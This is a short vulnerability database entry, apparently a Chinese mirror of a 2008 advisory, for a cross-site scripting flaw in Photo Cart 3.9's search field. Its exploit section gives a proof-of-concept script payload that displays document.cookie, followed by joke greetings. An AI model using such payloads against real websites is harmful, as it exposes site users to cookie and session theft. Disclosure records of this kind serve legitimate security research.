Photo Cart 3.9 index.php "search" XSS

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052551 漏洞类型
发布时间 2008-08-24 更新时间 2008-08-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008080066
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#######################################
Photo Cart 3.9 index.php "search" XSS
#######################################

Author: Tyler Trioxide
Link: http://www.picturespro.com/photocart/index.php

XSS in search functionality

~~~~Ub3r l33t $ploit~~~~:
POST <script>alert(document.cookie)</script> to "Gallery or event name" field

dooooomed!

sHoUtZ:
Fatback Mac and the BBQ gang, d00m3d! Chik3n hUnT3r 666, T4c0 b3LL
cRu, Hussin X, M4ri4 P, and El Chubacabra's Baby's Mama

Thankz:
Jesus Buddha Mohammad Vishnu Moses Jr.